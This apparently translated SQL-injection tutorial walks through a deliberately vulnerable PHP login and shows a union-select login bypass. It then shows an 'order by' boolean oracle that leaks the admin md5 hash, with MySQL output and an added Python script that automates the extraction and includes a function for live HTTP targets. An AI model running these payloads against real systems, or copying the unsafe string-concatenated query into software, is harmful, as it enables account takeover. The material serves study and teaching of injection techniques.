Login code:

```php
<?php
// Deliberately vulnerable login from the post: $username goes straight into the SQL.
// filter() is not shown on the page; per the original comment it rejects parentheses.
$username = $_POST['username'];
$password = $_POST['password'];
if (filter($username)) {
    // parentheses filtered: the request goes no further
} else {
    $sql = "SELECT * FROM admin WHERE username='" . $username . "'";
    $result = mysql_query($sql);
    @$row = mysql_fetch_array($result);   // only the FIRST row of the result is examined
    if (isset($row) && $row['username'] === 'admin') {
        if ($row['password'] === md5($password)) {
            // Login successful
        } else {
            die("password error!");
        }
    } else {
        die("username does not exist!");
    }
}
```
The table looks like this (the stored value is the unsalted md5 of the password):

```text
mysql> select * from admin where username='admin';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
```
This is an ordinary scenario: when a user logs in, a wrong username produces the message "username error" (the `die("username does not exist!")` branch), and a correct username with a wrong password produces "password error" (the `die("password error!")` branch). Two distinguishable responses are all a boolean oracle needs.
Looking at this logic, the first idea is naturally to use `union select` directly to forge a password and log in. The PHP code appends the closing quote itself, so the injected literal does not need one, and `c4ca4238a0b923820dcc509a6f75849b` is `md5('1')`, which is why `password=1` then passes the check:

```text
username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1
```

```text
mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
```
But what if we want to obtain the stored `password` hash itself?

The login messages give us a boolean condition. How can we exploit that condition with `order by`? The trick is to put our own row into the result set with `union select` and sort the whole set on the password column: the PHP code only inspects the first row, so the error message reveals which row sorted first, i.e. whether our guess sorts before or after the real hash.
```text
mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 51                               |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 52                               |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
```
When the guess sorts first, the first row has username `2`, so the application answers "username does not exist!"; when the real hash sorts first, it answers "password error!". `'5'` and `'51'` sort before `51b7...`, `'6'` and `'52'` sort after it, so the hash begins with `51`. Deciding one position at a time in this way recovers the whole `password` hash (the md5, which still has to be cracked offline before it can be used to log in).
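The following script is an added example, not code from the original post: it automates the position-by-position procedure above and generalises it to a binary search over the sixteen hex digits (four queries per digit instead of up to sixteen). The admin table is constructed inline as an in-memory stand-in for MySQL, `simulated_oracle` plays the role of index.php, and `http_oracle` (hypothetical URL, never called here) shows the same oracle against a live target. One refinement over the post's raw guesses: a sentinel `z` is appended to each probe so that the probe can never be exactly equal to the hash, because MySQL makes no guarantee about the order of rows that tie under `ORDER BY`.

```python
import urllib.parse
import urllib.request

HEX = "0123456789abcdef"
SENTINEL = "z"  # sorts after every hex digit, so a probe never ties with the real hash

# Constructed sample data: the admin table from the post (unsalted md5 as stored)
ADMIN_TABLE = [
    {"id": 1, "username": "admin", "password": "51b7a76d51e70b419f60d3473fb6f900"},
]


def build_payload(guess):
    """Value of the `username` POST field. index.php wraps it in single quotes, so the
    closing quote of the injected string literal is supplied by the application."""
    return f"' or 1 union select 1,2,'{guess}' order by 3"


def simulated_oracle(guess, table=ADMIN_TABLE):
    """In-memory stand-in for index.php + MySQL (assumption: models exactly the post's
    query and nothing more). Returns True when the admin row is sorted first
    ("password error!") and False when the injected row is sorted first
    ("username does not exist!")."""
    # `where username='' or 1` returns every real row; the UNION adds (1, '2', guess)
    rows = [(r["id"], r["username"], r["password"]) for r in table]
    rows.append((1, "2", guess))
    # ORDER BY 3 ascending. For lowercase hex plus the sentinel, MySQL's default
    # case-insensitive collation orders strings exactly like Python's comparison.
    first = min(rows, key=lambda r: r[2])
    return first[1] == "admin"  # PHP: $row['username'] === 'admin'


def http_oracle(url, guess, timeout=10):
    """Same oracle against a live target (hypothetical URL; not exercised here).
    Assumption: the page returns the literal strings from the post's PHP source."""
    data = urllib.parse.urlencode(
        {"username": build_payload(guess), "password": "x"}).encode()
    req = urllib.request.Request(url, data=data)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode(errors="replace")
    if "password error" in body:
        return True
    if "username does not exist" in body:
        return False
    raise RuntimeError("unexpected response; the filter may have blocked the payload")


def extract_hash(oracle, length=32):
    """Recover the hash one hex digit at a time, four oracle queries per digit.
    With the sentinel appended, 'admin row first' <=> prefix+c+'z' sorts after the
    hash <=> c >= hash[i], so the smallest c answering True is the real digit."""
    recovered = ""
    for _ in range(length):
        lo, hi = 0, len(HEX) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(recovered + HEX[mid] + SENTINEL):
                hi = mid        # HEX[mid] >= real digit
            else:
                lo = mid + 1    # HEX[mid] < real digit
        recovered += HEX[lo]    # HEX[15] always answers True, so lo is well defined
    return recovered


if __name__ == "__main__":
    # The four probes from the post, replayed against the simulated table
    for g in ("5", "6", "51", "52"):
        print(repr(g), "admin row first" if simulated_oracle(g) else "injected row first")
    print(extract_hash(simulated_oracle))
```

The payload keeps the post's `'' or 1` form, which pulls every row of `admin` into the sort. If the table holds more users than just `admin`, the first row is only `admin` when its hash also sorts before every other user's hash, so against a real multi-user table restrict the first SELECT (for example `admin' union select ...`) before relying on the oracle.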
Obviously this method is rarely used in practice, but it may be useful in some specific environments, such as a lab setup. If parentheses are filtered, the usual blind-injection building blocks (`substr()`, `ascii()`, `if()`, `sleep()`, `benchmark()`) are all unavailable, whereas `order by` on a string literal needs none of them, so injection can still proceed through `order by`. (Plain comparisons such as `password < '52'` avoid parentheses too; the point of the `order by` variant is that it works from the union row alone.)
Source: http://www.bubuko.com/infodetail-2360669.html